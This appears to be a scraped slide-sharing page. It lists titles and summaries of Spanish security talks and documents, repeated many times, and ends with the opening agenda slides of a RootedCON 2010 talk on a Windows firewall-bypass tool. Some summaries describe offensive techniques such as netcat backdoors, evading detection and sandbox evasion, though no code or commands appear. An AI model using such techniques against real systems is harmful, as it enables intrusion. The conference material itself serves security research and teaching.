WiFiSlax es una distribución Linux live CD orientada a la seguridad inalámbrica. Presenta herramientas actualizadas para auditoría wireless como Kismet, aircrack-ng y suites para estudiar cifrados WEP, WPA y WPA2. Está traducido al español y facilita su uso para usuarios no familiarizados con Linux a través de lanzadores y ayuda básica. La comunidad detrás de WiFiSlax incluye elhacker.net, seguridadwireless.net y wifislax.com.

Seguridad informatica

Seguridad informatica

Seguridad informatica

Internet es una red mundial de computadoras que permite el acceso y compartir de información. El protocolo TCP/IP especifica cómo los datos deben ser transmitidos entre computadoras conectadas a Internet. Los navegadores web como Internet Explorer permiten a los usuarios ver páginas web y acceder a servicios en línea como correo electrónico y chat. Existen normas nacionales e internacionales relacionadas a la seguridad cibernética para proteger los sistemas y datos.

CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003

CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003

CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003

Internet Security Auditors

Kali Linux

JoseEspinosaVazquez

Kali Linux es una distribución de Linux diseñada para la realización de pruebas de penetración y auditorías de seguridad. Incluye más de 300 herramientas avanzadas para la recopilación de información, análisis de vulnerabilidades, pruebas de penetración en redes inalámbricas y sistemas, y tareas forenses. Otras distribuciones relacionadas son Kali Linux NetHunter para dispositivos móviles y BackTrack 5, ya retirado.

Ataques de denegacion de servicio

Ataques de denegacion de servicio

Ataques de denegacion de servicio

Camilo Fernandez

Propietario

IsraelIvanGarcaLpez

Present3

Rafael Cornejo Martinez

tehnik mobile hacking

tehnik mobile hacking

tehnik mobile hacking

Seguridad inalámbrica

Seguridad inalámbrica

Seguridad inalámbrica

Este documento clasifica varios softwares relacionados con la seguridad inalámbrica, incluyendo descripciones, licencias, plataformas compatibles, si protegen o vulneran la seguridad, y enlaces de descarga. También responde preguntas sobre la mejor protección Wi-Fi, cómo vulnerar la seguridad Wi-Fi, cómo construir una antena Wi-Fi casera, y detectores Wi-Fi. Finalmente, justifica frases sobre vulnerabilidades de redes inalámbricas usando recursos de internet.

Laboratorio de Maquinas Virtuales

Laboratorio de Maquinas Virtuales

Laboratorio de Maquinas Virtuales

Eduardo Fernández

Hacking withinnails pdfcompleto

Hacking withinnails pdfcompleto

Hacking withinnails pdfcompleto

Securinf.com Seguridad Informatica - Tecnoweb2.com

Este documento describe cómo crear malware de forma básica sin necesidad de habilidades de programación avanzadas. Explica cómo desarrollar una carga útil de backdoor usando netcat para abrir un puerto y establecer una conexión, y también analiza el uso de spyware. Luego detalla los pasos para empaquetar el malware, evadir detección e infectar otros sistemas dentro de una red. El objetivo es lograr resultados de intrusión usando técnicas de nivel básico.

Jornada de ciberdefensa stuxnet

Jornada de ciberdefensa stuxnet

Jornada de ciberdefensa stuxnet

Alejandro Ramos

Stuxnet fue el primer ciberataque dirigido a sistemas industriales de control. Se propagó infectando sistemas en Irán, posiblemente con el objetivo de sabotear las instalaciones nucleares de Natanz y Bushehr. Utilizó cuatro vulnerabilidades de Windows y se propagó a través de dispositivos USB para infectar sistemas industriales de Siemens y causar daños físicos. Su complejidad indica que fue desarrollado por estados nacionales para sabotear el programa nuclear iraní.

Wifislax 3.1

Conferencias FIST

Wifislax 3.1

Conferencias FIST

WiFiSlax es una distribución Linux live CD orientada a la auditoría de seguridad inalámbrica. Incluye herramientas como Kismet, aircrack y aircrack-ng para auditoría WiFi, así como herramientas Bluetooth como BlueZ y aplicaciones para ataques como Bluebug y Bluesnarf. El objetivo es facilitar el uso de Linux para seguridad inalámbrica y concienciar sobre los riesgos de WEP y otras redes inseguras.

Presentacion de la practica berdin 1500060000

Presentacion de la practica berdin 1500060000

Presentacion de la practica berdin 1500060000

geovanniurielgonzale

Presentación de la practica -1. Verdin

Presentación de la practica -1. Verdin

Presentación de la practica -1. Verdin

geovanniurielgonzale

El documento habla sobre el firewall, describiendo que es un dispositivo o software que filtra el tráfico de red entrante y saliente. Explica que un firewall permite o bloquea el tráfico basado en reglas de configuración. También discute las ventajas de un firewall como proteger la seguridad y privacidad, y las desventajas como posible degradación del rendimiento. Además, distingue entre firewalls de software y hardware, e incluye un diagrama y pasos para configurar un firewall en Windows.

Similar a Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010] (20)

Curso linux clase_2_2012

Curso linux clase_2_2012

Curso linux clase_2_2012

David López Paz - Global Warfare [RootedCON 2011]

David López Paz - Global Warfare [RootedCON 2011]

David López Paz - Global Warfare [RootedCON 2011]

VC4NM73 EQ#4-W8,U5,T4

VC4NM73 EQ#4-W8,U5,T4

VC4NM73 EQ#4-W8,U5,T4

Vc4 nm73 eq#4-w8,u5,t4

Vc4 nm73 eq#4-w8,u5,t4

Vc4 nm73 eq#4-w8,u5,t4

Wi Fi Slax 3.1 Fist Conference

Wi Fi Slax 3.1 Fist Conference

Wi Fi Slax 3.1 Fist Conference

Seguridad informatica

Seguridad informatica

Seguridad informatica

CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003

CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003

CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003

Kali Linux

Ataques de denegacion de servicio

Ataques de denegacion de servicio

Ataques de denegacion de servicio

Propietario

Present3

tehnik mobile hacking

tehnik mobile hacking

tehnik mobile hacking

Seguridad inalámbrica

Seguridad inalámbrica

Seguridad inalámbrica

Laboratorio de Maquinas Virtuales

Laboratorio de Maquinas Virtuales

Laboratorio de Maquinas Virtuales

Hacking withinnails pdfcompleto

Hacking withinnails pdfcompleto

Hacking withinnails pdfcompleto

Jornada de ciberdefensa stuxnet

Jornada de ciberdefensa stuxnet

Jornada de ciberdefensa stuxnet

Wifislax 3.1

Wifislax 3.1

Presentacion de la practica berdin 1500060000

Presentacion de la practica berdin 1500060000

Presentacion de la practica berdin 1500060000

Presentación de la practica -1. Verdin

Presentación de la practica -1. Verdin

Presentación de la practica -1. Verdin

Más de RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde

Este documento presenta la plataforma SecAP, la cual automatiza las tareas de pentesting de una manera inteligente y autónoma. SecAP funciona como una suite de herramientas que incluye conectores, lanzadores, analizadores y una API REST. Coordina el proceso de pentesting al almacenar los activos descubiertos, lanzar las herramientas apropiadas, analizar los resultados y continuar la auditoría de forma autónoma. El documento describe la arquitectura, componentes, flujo de trabajo y ventajas de SecAP,

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...

Este documento describe una investigación sobre la identificación y evasión de entornos de análisis sandbox. Los investigadores desarrollaron artefactos para recopilar información de varias sandbox y analizar su seguridad. Encontraron que algunas sandbox no ocultan bien su naturaleza y que es posible acceder a archivos de configuración. También pudieron identificar a los propietarios de algunas sandbox mediante vulnerabilidades de XSS. Concluyen que es posible obtener inteligencia sobre cómo funcionan las sandbox y evadir su detección.

Rooted2020 hunting malware-using_process_behavior-roberto_amado

Rooted2020 hunting malware-using_process_behavior-roberto_amado

Rooted2020 hunting malware-using_process_behavior-roberto_amado

Este documento describe una herramienta de correlación de procesos Sysmon que monitorea el comportamiento de procesos en un sistema para detectar actividad maliciosa. La herramienta incluye un motor de línea base que establece el comportamiento normal de procesos clave y un motor de jerarquía que detecta anomalías en la relación entre procesos padre e hijo. La herramienta puede usarse para cazar malware avanzado que opera en memoria sin dejar rastros en el disco.

Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_

Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_

Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_

Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...

Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...

Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...

This document discusses how software developers can be deceived through malicious software libraries uploaded to package managers. It describes how the researchers generated homograph variants of popular library names and uploaded them to PyPI and npm. Within a few hours hundreds of developers had installed the malicious libraries, demonstrating vulnerabilities in how developers and package managers prevent homograph attacks. The researchers then analyzed the results and issues recommendations to package managers on additional controls like rate limiting and mandatory user identification that could help prevent such attacks.

Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...

Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...

Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...

Este documento resume la legislación española e internacional sobre el whistleblowing o denuncia de irregularidades. Explica que las empresas están obligadas a disponer de canales internos de denuncia confidenciales y protegidos, y que los denunciantes no pueden sufrir represalias. La normativa incluye infracciones relacionadas con la ciberseguridad, como incidentes de seguridad y filtraciones de datos. Las empresas deben transponer estas directivas antes de 2021, aunque se concede más tiempo para pymes.

Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...

Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...

Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...

El documento presenta los resultados de un análisis de seguridad de plugins de WordPress. Se analizaron 84,508 plugins encontrando 1,775 vulnerables con 5,419 vulnerabilidades en total, predominando la inyección SQL. Se desarrolló una infraestructura llamada WordPressTerror para automatizar el análisis. Los resultados se informaron al equipo de seguridad de WordPress para notificar a los desarrolladores. El objetivo final es mejorar la seguridad de WordPress y sus plugins.

Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer

Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer

Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer

El documento presenta una charla sobre atacando comunicaciones de voz cifradas. Se discuten varios protocolos de cifrado como SIP, SRTP, ZRTP y Signal. Se explican sus características de seguridad y posibles ataques como interceptación de tráfico, suplantación de identidad y escucha de conversaciones. El objetivo es crear conciencia sobre la importancia de cifrar las comunicaciones para proteger la privacidad.

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy

Stefano Maccaglia is a Senior Principal Consultant at RSA who investigates cyber incidents. The document describes an investigation conducted at a government agency that discovered stolen data on an internal system. RSA found the system, called ASFOUR, had been compromised since August 2018. By analyzing logs and network traffic with RSA tools, they traced the activity to an adversary accessing ASFOUR and another system called HAKIMI. They also found evidence of two threat groups - Oilrig and Epic Turla. RSA helped the agency remediate by rebuilding compromised systems, resetting passwords, and removing unused accounts.

Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...

Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...

Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...

El documento describe un taller sobre análisis de binarios creados en GoLang. Explica quiénes son los presentadores, por qué es importante aprender sobre este nuevo lenguaje, las características de GoLang, ejemplos de malware creados en GoLang, y el proceso de generación y análisis de binarios de GoLang, incluyendo cómo recuperar los nombres de funciones y cadenas de caracteres en binarios strippeados. El taller concluye con un reto práctico de obtener un flag de un binario de muestra.

Rooted2020 virtual pwned-network_-_manel_molina

Rooted2020 virtual pwned-network_-_manel_molina

Rooted2020 virtual pwned-network_-_manel_molina

Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...

Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...

Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...

Este documento proporciona 10 recomendaciones para mejorar la seguridad de una red, como actualizar sistemas, implementar SPF y DKIM para el correo electrónico, prohibir macros, usar LAPS para contraseñas de administrador local, segmentar la red con VLAN, y realizar copias de seguridad fuera de la red. También recomienda eliminar protocolos obsoletos, auditar los permisos de Active Directory, y elevar los costos para los atacantes al interior de la red. El objetivo general es dificultar el acceso no autorizado

Rooted2020 todo a-siem_-_marta_lopez

Rooted2020 todo a-siem_-_marta_lopez

Rooted2020 todo a-siem_-_marta_lopez

El documento discute brevemente varios incidentes cibernéticos atribuidos a China, incluidos ataques a OPM, Equifax y Anthem. También menciona unidades de amenazas avanzadas persistentes chinas como APT1 y Comment Crew. Explica conceptos como IOC, TTP y marcos como ATT&CK y CAPEC para analizar amenazas. Finalmente, proporciona numerosos enlaces a fuentes adicionales sobre ciberespionaje chino y otros temas relacionados.

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero

The document describes a proof-of-concept malware called "evil mass storage" that can infect systems without an internet connection. It uses a custom hardware device with a micro SD card and radio frequency module to exfiltrate information from infected targets. The malware has multiple stages and can hide in encrypted sectors on the SD card or transmit data via radio. Details are provided on the prototype hardware, firmware, and future improvements planned for the project.

Rooted2020 live coding--_jesus_jara

Rooted2020 live coding--_jesus_jara

Rooted2020 live coding--_jesus_jara

Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...

Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...

Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...

Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...

Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...

Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...

Este documento presenta una introducción a Bluetooth Low Energy (BLE), incluyendo su historia, funcionamiento y vulnerabilidades. Explica conceptos clave como el emparejamiento, los canales y los tipos de paquetes. Luego describe varios ataques realizados contra dispositivos BLE, como trackers, cámaras y monopatines eléctricos. Finalmente, ofrece recomendaciones para fortalecer la seguridad de BLE a través del cifrado y mecanismos robustos de intercambio de claves.

Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste

Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste

Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste

Este documento describe un método para generar ejemplos adversarios (AE) que evadan detectores de malware basados en aprendizaje profundo. El método propuesto utiliza perturbaciones en las cabeceras de los archivos binarios y optimización mediante algoritmos genéticos para introducir cambios que eviten la detección sin afectar al comportamiento. Los resultados experimentales muestran que el enfoque alcanza tasas de evasión de hasta el 98.23% frente a MalConv, un detector de estado del arte.

Rooted2020 encontrando 0days-en_2020_-_antonio_morales

Rooted2020 encontrando 0days-en_2020_-_antonio_morales

Rooted2020 encontrando 0days-en_2020_-_antonio_morales

El documento describe diferentes técnicas avanzadas de fuzzing como mutation scheduling, structure-aware fuzzing y domain-specific feedback. Explica cómo estas técnicas pueden ayudar a encontrar vulnerabilidades de forma más eficiente explorando el espacio de búsqueda de manera inteligente. También incluye ejemplos de vulnerabilidades encontradas mediante fuzzing como CVE-2020-9273 y CVE-2020-9365.

Más de RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...

Rooted2020 hunting malware-using_process_behavior-roberto_amado

Rooted2020 hunting malware-using_process_behavior-roberto_amado

Rooted2020 hunting malware-using_process_behavior-roberto_amado

Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_

Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_

Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_

Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...

Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...

Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...

Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...

Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...

Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...

Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...

Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...

Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...

Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer

Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer

Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy

Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...

Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...

Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...

Rooted2020 virtual pwned-network_-_manel_molina

Rooted2020 virtual pwned-network_-_manel_molina

Rooted2020 virtual pwned-network_-_manel_molina

Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...

Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...

Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...

Rooted2020 todo a-siem_-_marta_lopez

Rooted2020 todo a-siem_-_marta_lopez

Rooted2020 todo a-siem_-_marta_lopez

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero

Rooted2020 live coding--_jesus_jara

Rooted2020 live coding--_jesus_jara

Rooted2020 live coding--_jesus_jara

Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...

Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...

Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...

Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...

Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...

Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...

Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste

Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste

Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste

Rooted2020 encontrando 0days-en_2020_-_antonio_morales

Rooted2020 encontrando 0days-en_2020_-_antonio_morales

Rooted2020 encontrando 0days-en_2020_-_antonio_morales

Último

Manual Web soporte y mantenimiento de equipo de computo

Manual Web soporte y mantenimiento de equipo de computo

Manual Web soporte y mantenimiento de equipo de computo

mantenimientocarbra6

Projecte Iniciativa TIC 2024 HPE. inCV.pdf

Projecte Iniciativa TIC 2024 HPE. inCV.pdf

Projecte Iniciativa TIC 2024 HPE. inCV.pdf

HPE presenta una competició destinada a estudiants, que busca fomentar habilitats tecnològiques i promoure la innovació en un entorn STEAM (Ciència, Tecnologia, Enginyeria, Arts i Matemàtiques). A través de diverses fases, els equips han de resoldre reptes mensuals basats en àrees com algorísmica, desenvolupament de programari, infraestructures tecnològiques, intel·ligència artificial i altres tecnologies. Els millors equips tenen l'oportunitat de desenvolupar un projecte més gran en una fase presencial final, on han de crear una solució concreta per a un conflicte real relacionat amb la sostenibilitat. Aquesta competició promou la inclusió, la sostenibilitat i l'accessibilitat tecnològica, alineant-se amb els Objectius de Desenvolupament Sostenible de l'ONU.

Manual de soporte y mantenimiento de equipo de cómputo

Manual de soporte y mantenimiento de equipo de cómputo

Manual de soporte y mantenimiento de equipo de cómputo

doctorsoluciones34

PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf

PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf

PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf

EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD

EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD

EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD

AngelCristhianMB

computacion global 3.pdf pARA TERCER GRADO

computacion global 3.pdf pARA TERCER GRADO

computacion global 3.pdf pARA TERCER GRADO

Nuevos tiempos, nuevos espacios.docxdsdsad

Nuevos tiempos, nuevos espacios.docxdsdsad

Nuevos tiempos, nuevos espacios.docxdsdsad

larapalaciosmonzon28

Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf

Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf

Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf

edublogs info.docx asdasfasfsawqrdqwfqwfqwfq

edublogs info.docx asdasfasfsawqrdqwfqwfqwfq

edublogs info.docx asdasfasfsawqrdqwfqwfqwfq

larapalaciosmonzon28

625204013-64-Camino-a-----La-Lectura.pdf

625204013-64-Camino-a-----La-Lectura.pdf

625204013-64-Camino-a-----La-Lectura.pdf

Presentación de Tic en educación y sobre blogger

Presentación de Tic en educación y sobre blogger

Presentación de Tic en educación y sobre blogger

larapalaciosmonzon28

Flows: Mejores Prácticas y Nuevos Features

Flows: Mejores Prácticas y Nuevos Features

Flows: Mejores Prácticas y Nuevos Features

Paola De la Torre

REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO

REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO

REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO

gisellearanguren1

Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf

Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf

Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf

SOPRA STERIA presenta una aplicació destinada a persones amb discapacitat intel·lectual que busca millorar la seva integració laboral i digital. Permet crear currículums de manera senzilla i intuitiva, facilitant així la seva participació en el mercat laboral i la seva independència econòmica. Aquesta iniciativa no només aborda la bretxa digital, sinó que també contribueix a reduir la desigualtat proporcionant eines accessibles i inclusives. A més, "inCV" està alineat amb els Objectius de Desenvolupament Sostenible de l'Agenda 2030, especialment els relacionats amb el treball decent i la reducció de desigualtats.

Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)

Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)

Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)

AbrahamCastillo42

Informació Projecte Iniciativa TIC HPE.pdf

Informació Projecte Iniciativa TIC HPE.pdf

Informació Projecte Iniciativa TIC HPE.pdf

Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)

Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)

Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)

TIC en educacion.rtf.docxlolololololololo

TIC en educacion.rtf.docxlolololololololo

TIC en educacion.rtf.docxlolololololololo

Modo test refrigeradores y codigos de errores 2018 V2.pdf

Modo test refrigeradores y codigos de errores 2018 V2.pdf

Modo test refrigeradores y codigos de errores 2018 V2.pdf

Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf

Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf

Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf

KAWARU CONSULTING presenta el projecte amb l'objectiu de permetre als ciutadans realitzar tràmits administratius de manera telemàtica, des de qualsevol lloc i dispositiu, amb seguretat jurídica. Aquesta plataforma redueix els desplaçaments físics i el temps invertit en tràmits, ja que es pot fer tot en línia. A més, proporciona evidències de la correcta realització dels tràmits, garantint-ne la validesa davant d'un jutge si cal. Inicialment concebuda per al Ministeri de Justícia, la plataforma s'ha expandit per adaptar-se a diverses organitzacions i països, oferint una solució flexible i fàcil de desplegar.

Último (20)

Manual Web soporte y mantenimiento de equipo de computo

Manual Web soporte y mantenimiento de equipo de computo

Manual Web soporte y mantenimiento de equipo de computo

Projecte Iniciativa TIC 2024 HPE. inCV.pdf

Projecte Iniciativa TIC 2024 HPE. inCV.pdf

Projecte Iniciativa TIC 2024 HPE. inCV.pdf

Manual de soporte y mantenimiento de equipo de cómputo

Manual de soporte y mantenimiento de equipo de cómputo

Manual de soporte y mantenimiento de equipo de cómputo

PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf

PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf

PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf

EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD

EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD

EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD

computacion global 3.pdf pARA TERCER GRADO

computacion global 3.pdf pARA TERCER GRADO

computacion global 3.pdf pARA TERCER GRADO

Nuevos tiempos, nuevos espacios.docxdsdsad

Nuevos tiempos, nuevos espacios.docxdsdsad

Nuevos tiempos, nuevos espacios.docxdsdsad

Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf

Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf

Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf

edublogs info.docx asdasfasfsawqrdqwfqwfqwfq

edublogs info.docx asdasfasfsawqrdqwfqwfqwfq

edublogs info.docx asdasfasfsawqrdqwfqwfqwfq

625204013-64-Camino-a-----La-Lectura.pdf

625204013-64-Camino-a-----La-Lectura.pdf

625204013-64-Camino-a-----La-Lectura.pdf

Presentación de Tic en educación y sobre blogger

Presentación de Tic en educación y sobre blogger

Presentación de Tic en educación y sobre blogger

Flows: Mejores Prácticas y Nuevos Features

Flows: Mejores Prácticas y Nuevos Features

Flows: Mejores Prácticas y Nuevos Features

REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO

REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO

REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO

Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf

Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf

Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf

Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)

Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)

Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)

Informació Projecte Iniciativa TIC HPE.pdf

Informació Projecte Iniciativa TIC HPE.pdf

Informació Projecte Iniciativa TIC HPE.pdf

Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)

Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)

Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)

TIC en educacion.rtf.docxlolololololololo

TIC en educacion.rtf.docxlolololololololo

TIC en educacion.rtf.docxlolololololololo

Modo test refrigeradores y codigos de errores 2018 V2.pdf

Modo test refrigeradores y codigos de errores 2018 V2.pdf

Modo test refrigeradores y codigos de errores 2018 V2.pdf

Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf

Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf

Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf

Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]

1. FuckWall A Windows Firewalls Bypassing Tool Congreso de Seguridad ~ Rooted CON’2010

2. ¿Quiénes no sómos? Investigadores buscando fallos en el protocolo DNS Congreso de Seguridad ~ Rooted CON’2010 2

3. ¿Quiénes no sómos? Hackers que vieron la luz al final del tunel y encontraron vida más allá de las consultoras... Congreso de Seguridad ~ Rooted CON’2010 3

4. ¿Quiénes no sómos? Cálico Electrónico Congreso de Seguridad ~ Rooted CON’2010 4

5. ¿Quiénes podríamos ser? M&M’s HackStory: Kernelpanik o Kpk fue un grupo de hackers nacido aproximadamente en el año 2000, según se desprende de la fecha de copyright de su web, aún activa. Las últimas noticias de Kernelpanik son de 2007, año en que se supone dejó de existir. Congreso de Seguridad ~ Rooted CON’2010 5

6. ¿De qué vamos a hablar? - Orígenes - La idea aka. “El concepto es el concepto” - PoC aka. “¿Esto realmente funciona?” - FuckWall aka. “La herramienta” - Demostración FuckWall aka. “Pa’habernos matao” Congreso de Seguridad ~ Rooted CON’2010 6

